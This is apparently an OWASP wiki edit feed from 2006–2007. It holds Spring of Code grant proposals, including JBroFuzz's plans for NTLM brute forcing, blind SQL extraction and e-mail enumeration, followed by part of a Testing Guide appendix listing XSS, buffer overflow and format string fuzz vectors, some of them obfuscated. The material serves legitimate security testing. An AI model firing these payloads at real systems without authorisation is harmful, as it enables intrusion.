&lt;br /&gt;
Based on the above, the new code elements that will be added are as follows:&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''&lt;br /&gt;
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''&lt;br /&gt;
&lt;br /&gt;
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: &lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''&lt;br /&gt;
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''&lt;br /&gt;
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''&lt;br /&gt;
&lt;br /&gt;
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.&lt;br /&gt;
&lt;br /&gt;
==== Background ==== &lt;br /&gt;
&lt;br /&gt;
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. &lt;br /&gt;
&lt;br /&gt;
Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.&lt;br /&gt;
&lt;br /&gt;
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Why should JBroFuzz be sponsored? ==== &lt;br /&gt;
&lt;br /&gt;
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.&lt;br /&gt;
&lt;br /&gt;
Keep the code platform independent adds a huge advantage. &lt;br /&gt;
&lt;br /&gt;
Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17282</id>
		<title>OWASP Spring Of Code 2007 Applications</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17282"/>
				<updated>2007-03-16T16:24:33Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]&lt;br /&gt;
&lt;br /&gt;
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''&lt;br /&gt;
&lt;br /&gt;
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application&lt;br /&gt;
&lt;br /&gt;
---------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:&lt;br /&gt;
&lt;br /&gt;
== {Your first name or Alias} - {Project name} ==&lt;br /&gt;
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].&lt;br /&gt;
&lt;br /&gt;
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic.  We strongly suggest that you include the following information in your proposal.&lt;br /&gt;
&lt;br /&gt;
* Your educational and professional background&lt;br /&gt;
&lt;br /&gt;
* Application security experience and accomplishments&lt;br /&gt;
&lt;br /&gt;
* Participation and leadership in open communities&lt;br /&gt;
&lt;br /&gt;
* The opportunity, challenges, issues or need your proposal addresses&lt;br /&gt;
&lt;br /&gt;
* Objectives or ways in which you will meet the goal(s)&lt;br /&gt;
&lt;br /&gt;
* Specific activities and who will carry out these activities&lt;br /&gt;
&lt;br /&gt;
* Specific deliverables and a rough project schedule so we can track progress&lt;br /&gt;
&lt;br /&gt;
* Long-term vision for the project&lt;br /&gt;
&lt;br /&gt;
* Any other reasons why you and your project should be selected&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Eoin Keary - Code review Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the OWASP Code review guide during this period.&lt;br /&gt;
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. &lt;br /&gt;
&lt;br /&gt;
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.&lt;br /&gt;
&lt;br /&gt;
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.&lt;br /&gt;
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.&lt;br /&gt;
 &lt;br /&gt;
The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.&lt;br /&gt;
Code review methodologies also need to be discussed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the code review guide:&lt;br /&gt;
* Add additional areas relating to the code review process such as:&lt;br /&gt;
** Benefits and pitfalls&lt;br /&gt;
** Methodology&lt;br /&gt;
** The code review process&lt;br /&gt;
*** Transactional analysis&lt;br /&gt;
*** Managing the code review process&lt;br /&gt;
*** Assigning risk to findings&lt;br /&gt;
&lt;br /&gt;
** Technical guides&lt;br /&gt;
*** Language specific best practice &lt;br /&gt;
*** Java &lt;br /&gt;
*** .NET &lt;br /&gt;
*** PHP &lt;br /&gt;
*** MySQL &lt;br /&gt;
*** Stored Procs &lt;br /&gt;
*** C/C++ &lt;br /&gt;
&lt;br /&gt;
** Code review by vulnerability:&lt;br /&gt;
*** Reviewing Code for Buffer Overruns and Overflows &lt;br /&gt;
*** Reviewing Code for OS Injection&lt;br /&gt;
*** Reviewing Code for SQL Injection&lt;br /&gt;
*** Reviewing Code for Data Validation&lt;br /&gt;
*** Reviewing code for XSS issues&lt;br /&gt;
*** Reviewing Code for Error Handling&lt;br /&gt;
*** Reviewing Code for Logging Issues&lt;br /&gt;
*** Reviewing The Secure Code Environment&lt;br /&gt;
*** Reviewing code for Authorization Issues&lt;br /&gt;
*** Reviewing code for Authentication Issues&lt;br /&gt;
*** Reviewing code for Session Integrity&lt;br /&gt;
*** Reviewing code for Cross Site Request Forgery&lt;br /&gt;
*** Reviewing code for Cryptography implementation issues&lt;br /&gt;
*** Reviewing code Dangerous HTTP Methods (Deployment)&lt;br /&gt;
*** Race Conditions &lt;br /&gt;
&lt;br /&gt;
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. &lt;br /&gt;
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. &lt;br /&gt;
&lt;br /&gt;
I have always  delivered any work I have volunteered for on time. &lt;br /&gt;
 &lt;br /&gt;
I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.&lt;br /&gt;
&lt;br /&gt;
== Paolo Perego - Owasp Orizon Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.&lt;br /&gt;
&lt;br /&gt;
I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.&lt;br /&gt;
&lt;br /&gt;
Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.&lt;br /&gt;
&lt;br /&gt;
I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Completing the static code review API section&lt;br /&gt;
* improving programming language to XML translator&lt;br /&gt;
* improving security best practices code review scan library&lt;br /&gt;
* improving secure coding fashion best practices library&lt;br /&gt;
* writing the pattern matching scan using the aformentioned libraries&lt;br /&gt;
Writing the java source code enforment objects&lt;br /&gt;
* writing an object to handle form data values to avoid XSS&lt;br /&gt;
* writing an object to handle form data values to avoid SQL Injection&lt;br /&gt;
* writing an object to handle HttpRequest and HttpSession objects&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.&lt;br /&gt;
&lt;br /&gt;
I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.&lt;br /&gt;
I'm a developer too so I understand also the &amp;quot;dark side&amp;quot; of the problem developing code with security in mind.&lt;br /&gt;
&lt;br /&gt;
I work using the &amp;quot;release early release often&amp;quot; paradigm so to be concrete and let other people having something usable to work with.&lt;br /&gt;
&lt;br /&gt;
== Sebastien Deleersnyder - OWASP Education Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. &lt;br /&gt;
&lt;br /&gt;
Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. &lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Currently the project goals are to create Educational Tracks: &lt;br /&gt;
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past&lt;br /&gt;
* A &amp;quot;Web Application Security Primer&amp;quot; Track for beginners (4 hours) &lt;br /&gt;
* A &amp;quot;What developers should know on Web Application Security&amp;quot; Track for developers (4 hours) &lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''': &lt;br /&gt;
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.&lt;br /&gt;
&lt;br /&gt;
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.&lt;br /&gt;
&lt;br /&gt;
If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.&lt;br /&gt;
&lt;br /&gt;
* '''More details''': &lt;br /&gt;
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.&lt;br /&gt;
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.&lt;br /&gt;
&lt;br /&gt;
== Subere - OWASP JBroFuzz Project ==&lt;br /&gt;
&lt;br /&gt;
==== Overview ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.&lt;br /&gt;
&lt;br /&gt;
==== Fuzzing ==== &lt;br /&gt;
&lt;br /&gt;
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.&lt;br /&gt;
&lt;br /&gt;
==== Objectives ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab'''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab'''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing using HTTPClient'''&lt;br /&gt;
* '''Blind SQL Injection Fuzzing Tab'''&lt;br /&gt;
&lt;br /&gt;
At the same time, the following existing tabs need to be updated and made more robust (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs'''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue'''&lt;br /&gt;
* '''Update Generators file format'''&lt;br /&gt;
* '''Include SOAP and XML fuzzing'''&lt;br /&gt;
&lt;br /&gt;
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.&lt;br /&gt;
&lt;br /&gt;
==== Deliverables ==== &lt;br /&gt;
&lt;br /&gt;
Based on the above, the new code elements that will be added are as follows:&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''&lt;br /&gt;
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''&lt;br /&gt;
&lt;br /&gt;
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: &lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''&lt;br /&gt;
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''&lt;br /&gt;
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''&lt;br /&gt;
&lt;br /&gt;
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.&lt;br /&gt;
&lt;br /&gt;
==== Background ==== &lt;br /&gt;
&lt;br /&gt;
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. &lt;br /&gt;
&lt;br /&gt;
Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.&lt;br /&gt;
&lt;br /&gt;
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Why should JBroFuzz should be sponsored? ==== &lt;br /&gt;
&lt;br /&gt;
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area focus that should not be dismissed in building secure software applications.&lt;br /&gt;
&lt;br /&gt;
Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality they have assisted in implementing. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Jbrf-05-sml.png&amp;diff=16627</id>
		<title>File:Jbrf-05-sml.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Jbrf-05-sml.png&amp;diff=16627"/>
				<updated>2007-02-21T22:45:22Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14339</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14339"/>
				<updated>2006-12-14T00:02:23Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Format String Errors (FSE) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replacive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replacive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
For details on XSS: [[Cross_site_scripting_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;&lt;br /&gt;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&lt;br /&gt;
 &amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;           &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.&lt;br /&gt;
&lt;br /&gt;
For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.&lt;br /&gt;
&lt;br /&gt;
An excellent introduction on FSE can be found in the USENIX paper entitled: [http://www.usenix.net/publications/library/proceedings/sec01/full_papers/shankar/shankar_html/index.html Detecting Format String Vulnerabilities with Type Qualifiers]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
